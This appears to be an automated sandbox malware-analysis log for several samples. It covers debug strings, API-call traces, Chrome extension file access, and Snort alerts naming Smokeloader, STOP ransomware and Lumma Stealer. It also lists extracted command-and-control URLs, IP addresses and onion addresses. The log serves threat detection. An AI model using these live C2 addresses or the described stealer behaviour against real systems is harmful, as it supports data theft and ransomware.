Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: DB15.exe, DB15.exe, 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 00000012.00000002.2843694068.0000000002890000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 00000013.00000002.4516721779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 00000015.00000002.2971579481.00000000028A0000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 00000016.00000002.2979075027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 0000001B.00000002.3053638727.0000000002840000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 0000001C.00000002.3061490314.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: Unable to locate the .pdb file in this location source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: The module signature does not match with .pdb signature. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: .pdb.dbg source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: '(EfiGuardDxe.pdbx source: 71C9.exe, 0000001D.00000003.3083456233.000000000414B000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: symsrv.pdbGCTL source: 71C9.exe, 0000001D.00000002.3185463938.0000000003A09000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000C7A000.00000040.00000001.01000000.0000000B.sdmp
Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: C:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000002B.00000002.3312441020.0000000000401000.00000020.00000001.01000000.00000017.sdmp, build3.exe, 0000002B.00000000.3160354253.0000000000401000.00000020.00000001.01000000.00000017.sdmp
Source: Binary string: 6C:\bap\xipuvi-g.pdb source: 71C9.exe, 0000001D.00000000.3076477137.0000000000410000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: or you do not have access permission to the .pdb location. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: EfiGuardDxe.pdb source: 71C9.exe, 0000001D.00000003.3083456233.000000000414B000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: DB15.exe, 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 00000012.00000002.2843694068.0000000002890000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 00000013.00000002.4516721779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 00000015.00000002.2971579481.00000000028A0000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 00000016.00000002.2979075027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 0000001B.00000002.3053638727.0000000002840000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 0000001C.00000002.3061490314.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: nss3.pdb source: build2.exe, 00000029.00000002.3579393951.000000006C64F000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: build2.exe, 00000029.00000002.3572254159.000000001E938000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3573071758.0000000020E7C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: dbghelp.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: C:\fub15\jekofesero\faduporixe_yaf.pdb source: DB15.exe, 0000000B.00000002.2819787929.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 0000000B.00000000.2817926575.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 0000000C.00000000.2819249973.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 00000010.00000002.2841208220.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000010.00000000.2836193602.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000011.00000000.2839475530.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000012.00000002.2842579793.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 00000012.00000000.2839477285.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 00000013.00000000.2840959577.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 00000015.00000000.2960769899.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000015.00000002.2966350391.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000016.00000000.2964684710.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 0000001B.00000002.3049973246.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 0000001B.00000000.3044970773.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 0000001C.00000000.3046708932.0000000000410000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: dbghelp.pdbGCTL source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: HC:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000002B.00000002.3312441020.0000000000401000.00000020.00000001.01000000.00000017.sdmp, build3.exe, 0000002B.00000000.3160354253.0000000000401000.00000020.00000001.01000000.00000017.sdmp
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose, 12_2_00410160
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose, 12_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose, 12_2_0040FB98
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose, 17_2_0040F730
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_00410160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose, 17_2_00410160
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose, 17_2_0040FB98
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

Networking

barindex
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.6:49707 -> 81.94.159.197:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.6:49710 -> 81.94.159.197:80
Source: Traffic Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.6:49714 -> 189.232.22.59:80
Source: Traffic Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.6:49714 -> 189.232.22.59:80
Source: Traffic Snort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.6:49717 -> 78.89.158.42:80
Source: Traffic Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 78.89.158.42:80 -> 192.168.2.6:49716
Source: Traffic Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 78.89.158.42:80 -> 192.168.2.6:49717
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.6:49720 -> 81.94.159.197:80
Source: Traffic Snort IDS: 2050741 ET TROJAN Lumma Stealer Related Domain in DNS Lookup (resergvearyinitiani .shop) 192.168.2.6:57745 -> 1.1.1.1:53
Source: Traffic Snort IDS: 2050742 ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI) 192.168.2.6:49721 -> 104.21.94.2:443
Source: Traffic Snort IDS: 2050742 ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI) 192.168.2.6:49722 -> 104.21.94.2:443
Source: Traffic Snort IDS: 2050742 ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI) 192.168.2.6:49724 -> 104.21.94.2:443
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.6:49725 -> 81.94.159.197:80
Source: Traffic Snort IDS: 2050742 ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI) 192.168.2.6:49726 -> 104.21.94.2:443
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.6:49728 -> 81.94.159.197:80
Source: Traffic Snort IDS: 2050742 ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI) 192.168.2.6:49729 -> 104.21.94.2:443
Source: Traffic Snort IDS: 2050742 ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI) 192.168.2.6:49732 -> 104.21.94.2:443
Source: Traffic Snort IDS: 2050742 ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI) 192.168.2.6:49734 -> 104.21.94.2:443
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.6:49735 -> 81.94.159.197:80
Source: Traffic Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.6:49737 -> 78.89.158.42:80
Source: Traffic Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.6:49737 -> 78.89.158.42:80
Source: C:\Windows\explorer.exe Network Connect: 172.67.156.20 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 81.94.159.197 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 189.232.22.59 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 172.253.115.138 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 192.185.16.114 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 162.159.129.233 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 103.23.232.80 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 172.67.207.127 443 Jump to behavior
Source: Malware configuration extractor URLs: associationokeo.shop
Source: Malware configuration extractor URLs: turkeyunlikelyofw.shop
Source: Malware configuration extractor URLs: pooreveningfuseor.pw
Source: Malware configuration extractor URLs: edurestunningcrackyow.fun
Source: Malware configuration extractor URLs: detectordiscusser.shop
Source: Malware configuration extractor URLs: problemregardybuiwo.fun
Source: Malware configuration extractor URLs: lighterepisodeheighte.fun
Source: Malware configuration extractor URLs: lighterepisodeheighte.fun
Source: Malware configuration extractor URLs: technologyenterdo.shop
Source: Malware configuration extractor URLs: resergvearyinitiani.shop
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199658817715
Source: Malware configuration extractor URLs: http://trad-einmyus.com/index.php
Source: Malware configuration extractor URLs: http://tradein-myus.com/index.php
Source: Malware configuration extractor URLs: http://trade-inmyus.com/index.php
Source: Malware configuration extractor URLs: http://sajdfue.com/test1/get.php
Source: 71C9.exe, 0000001D.00000002.3185463938.0000000003190000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: 71C9.exe, 0000001D.00000002.3222435019.000000000C538000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://statsexplorer.orghttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onion
Source: 71C9.exe, 0000001D.00000003.3083456233.0000000003A80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: 71C9.exe, 0000001D.00000002.3193553866.000000000C47C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onion
Source: 71C9.exe, 0000001D.00000002.3193553866.000000000C47C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://statsexplorer.orghttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionWbemScripting.SWbemLocatorMicrosoft Windows 10 ProWbemScripting.SWbemLocatorSELECT OSArchitecture FROM Win32_OperatingSystemLOGONSERVER=\\user-PCPROCESSOR_ARCHITECTURE=x86PROCESSOR_ARCHITEW6432=AMD64ProgramData=C:\ProgramData
Source: 71C9.exe, 0000001D.00000002.3193553866.000000000C46E000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: 0b1c1115494a5c52100110515d52141b57170d14161d12025206141340084056005707170746501e16121203571c1452160c10121450010500175112041a055b0c0b0a070bhttps://statsexplorer.orghttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionSELECT OSArchitecture FROM Win32_OperatingSystem.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCDriverData=C:\Windows\System32\Drivers\DriverData
Source: 71C9.exe, 0000001D.00000002.3193553866.000000000C46C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onion
Source: 71C9.exe, 0000001D.00000002.3193553866.000000000C46C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: !This program cannoHKEY_USERS\S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\TestAppHKEY_USERS\S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7https://statsexplorer.orghttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionSELECT Caption FROM Win32_OperatingSystemMicrosoft Windows 10 ProW. Europe Standard Time2024/03/28 17:51:34 current filenname with args "C:\Users\user\AppData\Local\Temp\71C9.exe"
Source: 71C9.exe, 0000001D.00000002.3193553866.000000000C41A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onion
